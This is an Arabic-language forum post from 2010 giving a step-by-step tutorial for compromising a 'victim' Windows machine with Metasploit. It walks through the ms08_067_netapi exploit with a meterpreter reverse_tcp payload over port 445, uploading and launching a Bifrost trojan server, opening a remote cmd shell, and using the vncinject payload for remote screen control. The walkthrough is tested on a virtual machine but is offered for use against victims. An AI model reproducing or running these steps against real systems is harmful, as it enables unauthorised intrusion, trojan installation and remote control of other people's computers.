عرض مشاركة واحدة
قديم 11-05-2010, 05:12 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
×KETO×
 
الصورة الرمزية ×KETO×
 

 

 
إحصائية العضو






×KETO× غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
×KETO× is on a distinguished road

افتراضي إختراق الضحية بالميتا ورفع سيرفر بيفروست


[align=center]السلام عليكم و رحمة الله و بركاته
وأنا أفكر طرأت لي فكرة لا أعرف إن كانت طرحت بعد المهم هي إختراق الضحية بالميتا ورفع سيرفر بيفروست هي المعلومة مش جديدة بس معلومة للي ما يعرفها وكما


سأتحدث عن سيطرة الجهاز بإستخدام playoad windows/vncinject


وسأجربها علي جهاز إفتراضي كفانا من الكلام ولنبدأ.







إضغط علي window وبعد ذلك علي console ستفتح لنا


النافذة التالية نكتب show exploits






ونختار windows/smb/ms08_067_netapi


show payloads





ونختار windows/meterpreter/reverse_tcp


أو نختارها مباشرة كما ف الصورة






والآن نقوم بتحديد IP الضحية وهو في هذه الحالة جهازي الإفتراضي RHOST = 192.168.56.101


ولا تنسي أن تضع رقم جهازك LHOST =192.168.56.1 لتطبيق الثغرة نكتب exploit وبعد ذلك enter





كما ترون في الصورة لقد نجحنا في تطبيق الثغرة والدخول لي الجهاز عن طريق port 445



************************************************** **********************


لنري خيارات نكتب help والآن سنقوم برفع السيرفر بالأمر upload -r server.exe c:\


كما في الصورة التالية ولكن قبل تحميل السيرفر يجب نسخه في مجلد


C:\Program Files\****sploit\Framework3





************************************************** ***********************
بعد رفع السيرفر نشغل برنامج الدوس للضحية بالأوامرالتالية:


use -m process


execute -f cmd.exe -c


interact 3


كما في الصورة حسب رقم channel أو session المفتوح






لتشغيل السيرفر start server.exe


************************************************** ************************


وكما توضح الصورة نجاح تحميل السيرفر






والصور تعبر عن نفسها





شاشة الضحية





لتطبيق payload windows/vncinject نقوم بنفس الخطوات السابقة ولكن بإستبدال



windows/meterpreter/smb/ms08_067_netapi


set windows/vncinject/reverse_tcp


بتطبيق الثغرة ستفتح لنا الشاشة التالية






و بكده نقدر نقول تم بحمد الله[/align]




Yojvhr hgqpdm fhgldjh ,vtu sdvtv fdtv,sj